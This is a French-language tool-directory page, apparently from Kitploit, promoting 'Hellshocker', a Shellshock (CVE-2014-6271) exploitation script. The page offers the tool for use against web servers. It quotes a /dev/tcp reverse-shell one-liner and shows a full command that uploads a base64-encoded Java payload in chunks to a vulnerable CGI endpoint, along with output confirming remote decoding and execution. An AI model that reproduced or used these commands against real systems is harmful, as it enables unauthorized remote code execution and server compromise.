Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2014-6271 — Script d'exploitation Shellshock capable de télécharger et d'exécuter du code à distance (RCE) en utilisant n'importe quel vecteur grâce à sa polyvalence. | Kitploit
Outils/GitHubGitHub/0x00-0x00/cve-2014-6271
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHub0x00-0x00/cve-2014-6271

CVE-2014-6271

Script d'exploitation Shellshock capable de télécharger et d'exécuter du code à distance (RCE) en utilisant n'importe quel vecteur grâce à sa polyvalence.

Voir le dépôt
322il y a 8 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Hellshocker 0.1.1

Outil pour exploiter la vulnérabilité Shellshock

Fatigué d'utiliser des exploits Shellshock faibles ou simplement « /bin/bash >& /dev/tcp/IP/port 0>&1 » pour vous frayer un chemin dans le serveur ?

Oui, vous devez télécharger et exécuter quelque chose de plus complexe sur le serveur, et encoder en base64 un fichier énorme est impossible pour que votre requête HTTP soit acceptée par le serveur web.

Vos problèmes pourraient être résolus avec cet outil. Il est capable d'encoder votre payload en base64 et de l'envoyer par morceaux (par défaut 128 octets) au serveur web, puis, une fois envoyé, il le décode et l'exécute.

« Waouh », dites-vous, « Mais je n'ai pas PHP, il me faut quelque chose pour Java. » Pas de problème, dis-je, cet outil est hautement personnalisable.

Regardez plutôt :

root@kitploit:~
python hellshocker.py --cgi http://website.com/cgi-bin/vulnerable --payload "java.jar" --destination "/tmp/java.jar" --trigger "/usr/bin/java -jar /tmp/java.jar" --base64
[*] Splitting data into chunks ...
[+] Payload data has been encoded to base64 format.
[*] There is 19 chunks to be sent to remote server
[*] Starting payload upload ...
[*] Uploading chunk #1
[*] Uploading chunk #2
[*] Uploading chunk #3
[*] Uploading chunk #4
[*] Uploading chunk #5
[*] Uploading chunk #6
[*] Uploading chunk #7
[*] Uploading chunk #8
[*] Uploading chunk #9
[*] Uploading chunk #10
[*] Uploading chunk #11
[*] Uploading chunk #12
[*] Uploading chunk #13
[*] Uploading chunk #14
[*] Uploading chunk #15
[*] Uploading chunk #16
[*] Uploading chunk #17
[*] Uploading chunk #18
[*] Uploading chunk #19
[+] Upload procedure has been completed.
[*] Decoding base64-encoded payload on remote server ...
[+] Remote command for decoding has been sent successfully sent.
[*] Triggering payload to execute ...
[+] Trigger command for payload execution has been succesfully sent.

Ensuite, votre payload a été transféré et exécuté avec succès. Sympa, non ? Oui, ça l'est.

Télécharger l’outil